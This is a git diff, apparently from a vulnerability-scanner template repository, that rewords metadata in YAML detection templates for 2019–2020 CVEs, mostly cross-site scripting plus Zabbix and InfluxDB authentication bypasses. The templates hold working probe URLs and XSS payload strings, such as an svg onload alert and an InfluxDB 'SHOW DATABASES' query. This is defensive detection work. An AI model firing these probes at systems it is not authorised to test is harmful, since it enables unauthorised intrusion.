-    - https://nvd.nist.gov/vuln/detail/CVE-2019-16931
     - https://wpvulndb.com/vulnerabilities/9893
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-16931
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -44,3 +44,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2019/CVE-2019-17382.yaml b/cves/2019/CVE-2019-17382.yaml
index 698d3e583b..fcd443d7f7 100644
--- a/cves/2019/CVE-2019-17382.yaml
+++ b/cves/2019/CVE-2019-17382.yaml
@@ -7,7 +7,7 @@ info:
   description: Zabbix through 4.4 is susceptible to an authentication bypass vulnerability via zabbix.php?action=dashboard.view&dashboardid=1. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin.
   reference:
     - https://www.exploit-db.com/exploits/47467
-    - https://www.cvedetails.com/cve/CVE-2019-17382/
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-17382
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
     cvss-score: 9.1
diff --git a/cves/2019/CVE-2019-18665.yaml b/cves/2019/CVE-2019-18665.yaml
index 4a42ec4f91..0af194d419 100644
--- a/cves/2019/CVE-2019-18665.yaml
+++ b/cves/2019/CVE-2019-18665.yaml
@@ -9,7 +9,6 @@ info:
   reference:
     - https://atomic111.github.io/article/secudos-domos-directory_traversal
     - https://vuldb.com/?id.144804
-    - https://www.cvedetails.com/cve/CVE-2019-18665
     - https://www.secudos.de/news-und-events/aktuelle-news/domos-release-5-6
     - https://nvd.nist.gov/vuln/detail/CVE-2019-18665
   classification:
diff --git a/cves/2019/CVE-2019-19134.yaml b/cves/2019/CVE-2019-19134.yaml
index ac96619ee4..aed3907378 100644
--- a/cves/2019/CVE-2019-19134.yaml
+++ b/cves/2019/CVE-2019-19134.yaml
@@ -1,15 +1,16 @@
 id: CVE-2019-19134
 
 info:
-  name: Hero Maps Premium < 2.2.3 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+  name: WordPress Hero Maps Premium <=2.2.1 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: The Hero Maps Premium plugin 2.2.1 and prior for WordPress is prone to unauthenticated XSS via the views/dashboard/index.php p parameter because it fails to sufficiently sanitize user-supplied input    - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
+  description: WordPress Hero Maps Premium plugin 2.2.1 and prior contains an unauthenticated reflected cross-site scripting vulnerability via the views/dashboard/index.php p parameter.
   reference:
     - https://wpscan.com/vulnerability/d179f7fe-e3e7-44b3-9bf8-aab2e90dbe01
     - https://www.hooperlabs.xyz/disclosures/cve-2019-19134.php
     - https://heroplugins.com/product/maps/
     - https://heroplugins.com/changelogs/hmaps/changelog.txt
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-19134
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -37,3 +38,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2019/CVE-2019-19368.yaml b/cves/2019/CVE-2019-19368.yaml
index f53a437d0e..40f3ae2243 100644
--- a/cves/2019/CVE-2019-19368.yaml
+++ b/cves/2019/CVE-2019-19368.yaml
@@ -1,14 +1,15 @@
 id: CVE-2019-19368
 
 info:
-  name: Rumpus FTP Web File Manager 8.2.9.1 XSS
+  name: Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting
   author: madrobot
   severity: medium
-  description: A Reflected Cross Site Scripting was discovered in the Login page of Rumpus FTP Web File Manager 8.2.9.1. An attacker can exploit it by sending a crafted link to end users and can execute arbitrary Javascripts
+  description: Rumpus FTP Web File Manager 8.2.9.1 contains a reflected cross-site scripting vulnerability via the Login page. An attacker can send a crafted link to end users and can execute arbitrary JavaScript.
   reference:
     - https://github.com/harshit-shukla/CVE-2019-19368/
     - https://www.maxum.com/Rumpus/Download.html
     - http://packetstormsecurity.com/files/155719/Rumpus-FTP-Web-File-Manager-8.2.9.1-Cross-Site-Scripting.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-19368
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -29,3 +30,5 @@ requests:
         words:
           - "value=''><sVg/OnLoAD=alert`1337`//'>"
         part: body
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2019/CVE-2019-19908.yaml b/cves/2019/CVE-2019-19908.yaml
index 9da11ffcf2..58f0f0bb2b 100644
--- a/cves/2019/CVE-2019-19908.yaml
+++ b/cves/2019/CVE-2019-19908.yaml
@@ -1,14 +1,15 @@
 id: CVE-2019-19908
 
 info:
-  name: phpMyChat-Plus - Cross-Site Scripting
+  name: phpMyChat-Plus 1.98 - Cross-Site Scripting
   author: madrobot
   severity: medium
-  description: phpMyChat-Plus 1.98 is vulnerable to reflected cross-site scripting (XSS) via JavaScript injection into the password reset URL. In the URL, the pmc_username parameter to pass_reset.php is vulnerable.
+  description: phpMyChat-Plus 1.98 contains a cross-site scripting vulnerability via pmc_username parameter of pass_reset.php in password reset URL.
   reference:
     - https://cinzinga.github.io/CVE-2019-19908/
     - http://ciprianmp.com/
     - https://sourceforge.net/projects/phpmychat/
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-19908
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -29,3 +30,5 @@ requests:
         words:
           - "<script>alert(1337)</script>"
         part: body
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2019/CVE-2019-20141.yaml b/cves/2019/CVE-2019-20141.yaml
index 0e04b5037f..d70eda17e9 100644
--- a/cves/2019/CVE-2019-20141.yaml
+++ b/cves/2019/CVE-2019-20141.yaml
@@ -1,14 +1,15 @@
 id: CVE-2019-20141
 
 info:
-  name: Neon Dashboard - Cross-Site Scripting
+  name: WordPress Laborator Neon Theme 2.0 - Cross-Site Scripting
   author: knassar702
   severity: medium
-  description: An XSS issue was discovered in the Laborator Neon theme 2.0 for WordPress via the data/autosuggest-remote.php q parameter.
+  description: WordPress Laborator Neon theme 2.0 contains a cross-site scripting vulnerability via the data/autosuggest-remote.php q parameter.
   reference:
     - https://knassar7o2.blogspot.com/2019/12/neon-dashboard-cve-2019-20141.html
     - https://knassar7o2.blogspot.com/2019/12/neon-dashboard-xss-reflected.html
     - https://knassar702.github.io/cve/neon/
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-20141
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -33,3 +34,5 @@ requests:
         words:
           - "text/html"
         part: header
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2019/CVE-2019-20210.yaml b/cves/2019/CVE-2019-20210.yaml
index 8e86b8402c..b3d521aaa9 100644
--- a/cves/2019/CVE-2019-20210.yaml
+++ b/cves/2019/CVE-2019-20210.yaml
@@ -1,16 +1,16 @@
 id: CVE-2019-20210
 
 info:
-  name: CTHthemes CityBook < 2.3.4 - Reflected XSS
+  name: WordPress CTHthemes - Cross-Site Scripting
   author: edoardottt
   severity: medium
   description: |
-    The CTHthemes CityBook before 2.3.4, TownHub before 1.0.6, and EasyBook before 1.2.2 themes for WordPress allow Reflected XSS via a search query.
+    WordPress CTHthemes CityBook before 2.3.4, TownHub before 1.0.6, and EasyBook before 1.2.2 themes contain reflected cross-site scripting vulnerabilities via a search query.
   reference:
     - https://wpscan.com/vulnerability/10013
-    - https://nvd.nist.gov/vuln/detail/CVE-2019-20210
     - https://wpvulndb.com/vulnerabilities/10018
     - https://cxsecurity.com/issue/WLB-2019120112
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-20210
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -40,3 +40,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2019/CVE-2019-20933.yaml b/cves/2019/CVE-2019-20933.yaml
index fbe3c4f008..d1a89615a9 100644
--- a/cves/2019/CVE-2019-20933.yaml
+++ b/cves/2019/CVE-2019-20933.yaml
@@ -1,5 +1,5 @@
-id: CVE-2019-20933
-
+id: CVE-2019-20933
+
 info:
   name: Authentication Bypass InfluxDB
   author: pussycat0x,c-sh0
@@ -20,20 +20,20 @@ info:
     shodan-dork: InfluxDB
     verified: "true"
   tags: unauth,db,influxdb,misconfig
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/query?db=db&q=SHOW%20DATABASES"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - '"results":'
-          - '"name":"databases"'
-        condition: and
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/query?db=db&q=SHOW%20DATABASES"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"results":'
+          - '"name":"databases"'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2019/CVE-2019-3402.yaml b/cves/2019/CVE-2019-3402.yaml
index 2acf979ed4..9624e09c44 100644
--- a/cves/2019/CVE-2019-3402.yaml
+++ b/cves/2019/CVE-2019-3402.yaml
@@ -1,13 +1,14 @@
 id: CVE-2019-3402
 
 info:
-  name: Jira - Reflected XSS using searchOwnerUserName parameter.
+  name: Jira <8.1.1 - Cross-Site Scripting
   author: pdteam
   severity: medium
-  description: The ConfigurePortalPages.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the searchOwnerUserName parameter.
+  description: Jira before 8.1.1 contains a cross-site scripting vulnerability via ConfigurePortalPages.jspa resource in the searchOwnerUserName parameter.
   reference:
     - https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c
     - https://jira.atlassian.com/browse/JRASERVER-69243
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-3402
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -30,4 +31,6 @@ requests:
       - type: word
         words:
           - "<script>alert(1)</script>"
-        part: body
\ No newline at end of file
+        part: body
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2019/CVE-2019-3911.yaml b/cves/2019/CVE-2019-3911.yaml
index 9ccfc5e726..377c323574 100644
--- a/cves/2019/CVE-2019-3911.yaml
+++ b/cves/2019/CVE-2019-3911.yaml
@@ -1,14 +1,12 @@
 id: CVE-2019-3911
-
 info:
-  name: LabKey Server < 18.3.0 - XSS
+  name: LabKey Server Community Edition <18.3.0 - Cross-Site Scripting
   author: princechaddha
   severity: medium
-  description: Reflected cross-site scripting (XSS) vulnerability in LabKey Server Community Edition before 18.3.0-61806.763 allows an unauthenticated remote attacker to inject arbitrary javascript via the onerror
-    parameter in the /__r2/query endpoints.
+  description: LabKey Server Community Edition before 18.3.0-61806.763 contains a reflected cross-site scripting vulnerability via the onerror parameter in the /__r2/query endpoints, which allows an unauthenticated remote attacker to inject arbitrary JavaScript.
   reference:
     - https://www.tenable.com/security/research/tra-2019-03
-    - https://www.cvedetails.com/cve/CVE-2019-3911
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-3911
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -17,24 +15,22 @@ info:
   metadata:
     shodan-query: 'Server: Labkey'
   tags: cve,cve2019,xss,labkey,tenable
-
 requests:
   - method: GET
     path:
       - '{{BaseURL}}/__r2/query-printRows.view?schemaName=ListManager&query.queryName=ListManager&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&query.containerFilterName=CurrentAndSubfolders&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL'
-
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
           - "</script><script>alert(document.domain)</script>"
-
       - type: word
         part: header
         words:
           - text/html
-
       - type: status
         status:
           - 200
+
+# Enhanced by cs on 2022/09/07
diff --git a/cves/2019/CVE-2019-7219.yaml b/cves/2019/CVE-2019-7219.yaml
index 5076968cb1..8eb0235b07 100644
--- a/cves/2019/CVE-2019-7219.yaml
+++ b/cves/2019/CVE-2019-7219.yaml
@@ -1,26 +1,25 @@
 id: CVE-2019-7219
-
 info:
-  name: Zarafa WebApp Reflected XSS
+  name: Zarafa WebApp <=2.0.1.47791 - Cross-Site Scripting
   author: pdteam
   severity: medium
   description: |
-    Unauthenticated reflected cross-site scripting (XSS) exists in Zarafa Webapp 2.0.1.47791 and earlier. NOTE: this is a discontinued product. The issue was fixed in later Zarafa Webapp versions; however, some former Zarafa Webapp customers use the related Kopano product instead.
+    Zarafa WebApp 2.0.1.47791 and earlier contains an unauthenticated reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
   reference:
     - https://github.com/verifysecurity/CVE-2019-7219
     - https://stash.kopano.io/repos?visibility=public
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-7219
+  remediation: This is a discontinued product. The issue was fixed in later versions. However, some former Zarafa WebApp customers use the related Kopano product instead.
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2019-7219
     cwe-id: CWE-79
   tags: cve,cve2019,zarafa,xss
-
 requests:
   - method: GET
     path:
       - '{{BaseURL}}/webapp/?fccc%27\%22%3E%3Csvg/onload=alert(/xss/)%3E'
-
     matchers-condition: and
     matchers:
       - type: word
@@ -31,7 +30,8 @@ requests:
         part: header
         words:
           - "text/html"
-
       - type: status
         status:
           - 200
+
+# Enhanced by cs on 2022/09/07
diff --git a/cves/2019/CVE-2019-7543.yaml b/cves/2019/CVE-2019-7543.yaml
index de81ecf465..949979ecba 100644
--- a/cves/2019/CVE-2019-7543.yaml
+++ b/cves/2019/CVE-2019-7543.yaml
@@ -1,10 +1,10 @@
 id: CVE-2019-7543
 
 info:
-  name: KindEditor 4.1.11, the php/demo.php - (XSS)
+  name: KindEditor 4.1.11 - Cross-Site Scripting
   author: pikpikcu
   severity: medium
-  description: KindEditor 4.1.11, the php/demo.php content1 parameter has a reflected Cross-site Scripting (XSS) vulnerability.
+  description: KindEditor 4.1.11 contains a cross-site scripting vulnerability via the php/demo.php content1 parameter.
   reference:
     - https://github.com/0xUhaw/CVE-Bins/tree/master/KindEditor
     - https://nvd.nist.gov/vuln/detail/CVE-2019-7543
@@ -36,3 +36,5 @@ requests:
         part: header
         words:
           - text/html
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2019/CVE-2019-8937.yaml b/cves/2019/CVE-2019-8937.yaml
index 8e85630281..c5c599bc42 100644
--- a/cves/2019/CVE-2019-8937.yaml
+++ b/cves/2019/CVE-2019-8937.yaml
@@ -1,15 +1,15 @@
 id: CVE-2019-8937
 
 info:
-  name: HotelDruid 2.3.0 - XSS
+  name: HotelDruid 2.3.0 - Cross-Site Scripting
   author: LogicalHunter
   severity: medium
-  description: HotelDruid 2.3.0 has XSS affecting the nsextt, cambia1, mese_fine, origine, and anno parameters in creaprezzi.php, tabella3.php, personalizza.php, and visualizza_tabelle.php.
+  description: HotelDruid 2.3.0 contains a cross-site scripting vulnerability affecting nsextt, cambia1, mese_fine, origine, and anno parameters in creaprezzi.php, tabella3.php, personalizza.php, and visualizza_tabelle.php.
   reference:
     - https://www.exploit-db.com/exploits/46429
-    - https://www.exploit-db.com/exploits/46429/
     - https://sourceforge.net/projects/hoteldruid/
     - http://packetstormsecurity.com/files/151779/HotelDruid-2.3-Cross-Site-Scripting.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-8937
   metadata:
     verified: true
   classification:
@@ -44,3 +44,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2019/CVE-2019-9955.yaml b/cves/2019/CVE-2019-9955.yaml
index ae8a3af37c..48deabbe87 100644
--- a/cves/2019/CVE-2019-9955.yaml
+++ b/cves/2019/CVE-2019-9955.yaml
@@ -1,17 +1,16 @@
 id: CVE-2019-9955
 
 info:
-  name: Zyxel - Reflected Cross-site Scripting
+  name: Zyxel - Cross-Site Scripting
   author: pdteam
   severity: medium
-  description: On Zyxel ATP200, ATP500, ATP800, USG20-VPN, USG20W-VPN, USG40, USG40W, USG60, USG60W, USG110, USG210, USG310, USG1100, USG1900, USG2200-VPN, ZyWALL 110, ZyWALL 310, ZyWALL 1100 devices, the security
-    firewall login page is vulnerable to Reflected XSS via the unsanitized 'mp_idx' parameter.
+  description: Zyxel ATP200, ATP500, ATP800, USG20-VPN, USG20W-VPN, USG40, USG40W, USG60, USG60W, USG110, USG210, USG310, USG1100, USG1900, USG2200-VPN, ZyWALL 110, ZyWALL 310, and ZyWALL 1100 devices contain a reflected cross-site scripting vulnerability on the security firewall login page via the mp_idx parameter.
   reference:
     - http://packetstormsecurity.com/files/152525/Zyxel-ZyWall-Cross-Site-Scripting.html
-    - http://seclists.org/fulldisclosure/2019/Apr/22
     - https://www.exploit-db.com/exploits/46706/
     - https://www.securitymetrics.com/blog/Zyxel-Devices-Vulnerable-Cross-Site-Scripting-Login-page
     - https://www.zyxel.com/support/reflected-cross-site-scripting-vulnerability-of-firewalls.shtml
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-9955
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -31,3 +30,5 @@ requests:
           - "\";alert('1');//"
           - "<title>Welcome</title>"
         condition: and
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2019/CVE-2019-9978.yaml b/cves/2019/CVE-2019-9978.yaml
index 4174e5d9a1..8df8646571 100644
--- a/cves/2019/CVE-2019-9978.yaml
+++ b/cves/2019/CVE-2019-9978.yaml
@@ -1,15 +1,16 @@
 id: CVE-2019-9978
 
 info:
-  name: WordPress social-warfare RFI
+  name: WordPress Social Warfare <3.5.3 - Cross-Site Scripting
   author: madrobot,dwisiswant0
   severity: medium
-  description: The social-warfare plugin before 3.5.3 for WordPress has stored XSS via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, as exploited in the wild in March 2019. This affects Social Warfare and Social Warfare Pro.
+  description: WordPress Social Warfare plugin before 3.5.3 contains a cross-site scripting vulnerability via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, affecting Social Warfare and Social Warfare Pro.
   reference:
     - https://github.com/mpgn/CVE-2019-9978
     - https://www.wordfence.com/blog/2019/03/unpatched-zero-day-vulnerability-in-social-warfare-plugin-exploited-in-the-wild/
     - https://www.pluginvulnerabilities.com/2019/03/21/full-disclosure-of-settings-change-persistent-cross-site-scripting-xss-vulnerability-in-social-warfare/
     - https://www.cybersecurity-help.cz/vdb/SB2019032105
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-9978
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -32,3 +33,5 @@ requests:
         part: interactsh_protocol
         words:
           - "http"
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2020/CVE-2020-11110.yaml b/cves/2020/CVE-2020-11110.yaml
index 45a9e76f63..5ee827da43 100644
--- a/cves/2020/CVE-2020-11110.yaml
+++ b/cves/2020/CVE-2020-11110.yaml
@@ -1,15 +1,15 @@
 id: CVE-2020-11110
 
 info:
-  name: Grafana Unauthenticated Stored XSS
+  name: Grafana <=6.7.1 - Cross-Site Scripting
   author: emadshanab
   severity: medium
-  description: Grafana through 6.7.1 allows stored XSS due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot.
+  description: Grafana through 6.7.1 contains an unauthenticated stored cross-site scripting vulnerability due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot.
   reference:
     - https://web.archive.org/web/20210717142945/https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html
-    - https://nvd.nist.gov/vuln/detail/CVE-2020-11110
     - https://github.com/grafana/grafana/blob/master/CHANGELOG.md
     - https://security.netapp.com/advisory/ntap-20200810-0002/
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-11110
   remediation: This issue can be resolved by updating Grafana to the latest version.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -57,3 +57,5 @@ requests:
         group: 1
         regex:
           - '"url":"([a-z:/0-9A-Z]+)"'
+
+# Enhanced by mp on 2022/09/02
diff --git a/cves/2020/CVE-2020-11930.yaml b/cves/2020/CVE-2020-11930.yaml
index c8eafd2fad..feca3dbdf3 100644
--- a/cves/2020/CVE-2020-11930.yaml
+++ b/cves/2020/CVE-2020-11930.yaml
@@ -1,16 +1,17 @@
 id: CVE-2020-11930
 
 info:
-  name: WordPress Plugin "Translate WordPress with GTranslate" (gtranslate) XSS
+  name: WordPress GTranslate <2.8.52 - Cross-Site Scripting
   author: dhiyaneshDK
   severity: medium
   description: |
-    The GTranslate plugin before 2.8.52 for WordPress was vulnerable to an Unauthenticated Reflected XSS vulnerability via a crafted link. This requires use of the hreflang tags feature within a sub-domain or sub-directory paid option.
+    WordPress GTranslate plugin before 2.8.52 contains an unauthenticated reflected cross-site scripting vulnerability via a crafted link. This requires use of the hreflang tags feature within a sub-domain or sub-directory paid option.
   reference:
     - https://wpscan.com/vulnerability/10181
     - https://payatu.com/blog/gaurav/analysis-of-cve-2020-11930:-reflected-xss-in-gtranslate-wordpress-module
     - https://plugins.trac.wordpress.org/changeset/2245581/gtranslate
     - https://plugins.trac.wordpress.org/changeset/2245591/gtranslate
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-11930
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -36,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/02
diff --git a/cves/2020/CVE-2020-12054.yaml b/cves/2020/CVE-2020-12054.yaml
index dfc39ddb16..105250058f 100644
--- a/cves/2020/CVE-2020-12054.yaml
+++ b/cves/2020/CVE-2020-12054.yaml
@@ -1,14 +1,16 @@
 id: CVE-2020-12054
 
 info:
-  name: Catch Breadcrumb < 1.5.7 - Unauthenticated Reflected XSS
+  name: WordPress Catch Breadcrumb <1.5.4 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: The Catch Breadcrumb plugin before 1.5.4 for WordPress allows Reflected XSS via the s parameter (a search query).
+  description: |
+    WordPress Catch Breadcrumb plugin before 1.5.4 contains a reflected cross-site scripting vulnerability via the s parameter (a search query). Also affected are 16 themes if the plugin is enabled: Alchemist and Alchemist PRO, Izabel and Izabel PRO, Chique and Chique PRO, Clean Enterprise and Clean Enterprise PRO, Bold Photography PRO, Intuitive PRO, Devotepress PRO, Clean Blocks PRO, Foodoholic PRO, Catch Mag PRO, Catch Wedding PRO, and Higher Education PRO.
   reference:
     - https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4
     - https://wpvulndb.com/vulnerabilities/10184
     - https://cxsecurity.com/issue/WLB-2020040144
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-12054
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -37,4 +39,6 @@ requests:
 
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200
+
+# Enhanced by mp on 2022/09/02
diff --git a/cves/2020/CVE-2020-14408.yaml b/cves/2020/CVE-2020-14408.yaml
index 8944da0f19..720c9bd013 100644
--- a/cves/2020/CVE-2020-14408.yaml
+++ b/cves/2020/CVE-2020-14408.yaml
@@ -1,10 +1,10 @@
 id: CVE-2020-14408
 
 info:
-  name: Agentejo Cockpit 0.10.2 - Reflected XSS
+  name: Agentejo Cockpit 0.10.2 - Cross-Site Scripting
   author: edoardottt
   severity: medium
-  description: An issue was discovered in Agentejo Cockpit 0.10.2. Insufficient sanitization of the to parameter in the /auth/login route allows for injection of arbitrary JavaScript code into a web page's content, creating a Reflected XSS attack vector.
+  description: Agentejo Cockpit 0.10.2 contains a reflected cross-site scripting vulnerability due to insufficient sanitization of the to parameter in the /auth/login route, which allows for injection of arbitrary JavaScript code into a web page's content.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -13,7 +13,6 @@ info:
   reference:
     - https://github.com/agentejo/cockpit/issues/1310
     - https://nvd.nist.gov/vuln/detail/CVE-2020-14408
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14408
   metadata:
     verified: true
   tags: cve,cve2022,cockpit,agentejo,xss,oss
@@ -39,3 +38,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/02
diff --git a/cves/2020/CVE-2020-5191.yaml b/cves/2020/CVE-2020-5191.yaml
index e384f1e7e5..3504447e65 100644
--- a/cves/2020/CVE-2020-5191.yaml
+++ b/cves/2020/CVE-2020-5191.yaml
@@ -1,15 +1,15 @@
 id: CVE-2020-5191
 
 info:
-  name: Hospital Management System 4.0 - Cross-Site Scripting
+  name: PHPGurukul Hospital Management System - Cross-Site Scripting
   author: TenBird
   severity: medium
   description: |
-    PHPGurukul Hospital Management System in PHP v4.0 suffers from multiple Persistent XSS vulnerabilities.
+    PHPGurukul Hospital Management System in PHP 4.0 contains multiple cross-site scripting vulnerabilities. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
   reference:
     - https://www.exploit-db.com/exploits/47841
-    - https://nvd.nist.gov/vuln/detail/CVE-2020-5191
     - https://phpgurukul.com/hospital-management-system-in-php/
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-5191
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -53,3 +53,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/02
diff --git a/cves/2020/CVE-2020-8115.yaml b/cves/2020/CVE-2020-8115.yaml
index ecef373f75..34d721aabf 100644
--- a/cves/2020/CVE-2020-8115.yaml
+++ b/cves/2020/CVE-2020-8115.yaml
@@ -1,21 +1,21 @@
 id: CVE-2020-8115
-
 info:
-  name: Revive Adserver XSS
+  name: Revive Adserver <=5.0.3 - Cross-Site Scripting
   author: madrobot,dwisiswant0
   severity: medium
   description: |
-    A reflected XSS vulnerability has been discovered in the publicly accessible afr.php delivery script of Revive Adserver <= 5.0.3 by Jacopo Tediosi. There are currently no known exploits: the session identifier cannot be accessed as it is stored in an http-only cookie as of v3.2.2. On older versions, however, under specific circumstances, it could be possible to steal the session identifier and gain access to the admin interface. The query string sent to the www/delivery/afr.php script was printed back without proper escaping in a JavaScript context, allowing an attacker to execute arbitrary JS code on the browser of the victim.
+    Revive Adserver 5.0.3 and prior contains a reflected cross-site scripting vulnerability in the publicly accessible afr.php delivery script. In older versions, it is possible to steal the session identifier and gain access to the admin interface. The query string sent to the www/delivery/afr.php script is printed back without proper escaping, allowing an attacker to execute arbitrary JavaScript code on the browser of the victim.
   reference:
     - https://hackerone.com/reports/775693
     - https://www.revive-adserver.com/security/revive-sa-2020-001/
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-8115
+  remediation: There are currently no known exploits. As of 3.2.2, the session identifier cannot be accessed as it is stored in an http-only cookie.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2020-8115
     cwe-id: CWE-79
   tags: cve,cve2020,xss,hackerone
-
 requests:
   - method: GET
     path:
@@ -28,4 +28,6 @@ requests:
       - type: regex
         part: body
         regex:
-          - (?mi)window\.location\.replace\(".*alert\(1337\)
\ No newline at end of file
+          - (?mi)window\.location\.replace\(".*alert\(1337\)
+
+# Enhanced by cs on 2022/09/07
diff --git a/cves/2020/CVE-2020-8191.yaml b/cves/2020/CVE-2020-8191.yaml
index e9319efe31..1387fcbba3 100644
--- a/cves/2020/CVE-2020-8191.yaml
+++ b/cves/2020/CVE-2020-8191.yaml
@@ -1,13 +1,14 @@
 id: CVE-2020-8191
 
 info:
-  name: Citrix ADC & NetScaler Gateway Reflected XSS
+  name: Citrix ADC/Gateway - Cross-Site Scripting
   author: dwisiswant0
   severity: medium
   description: |
-    Improper input validation in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows reflected Cross Site Scripting (XSS).
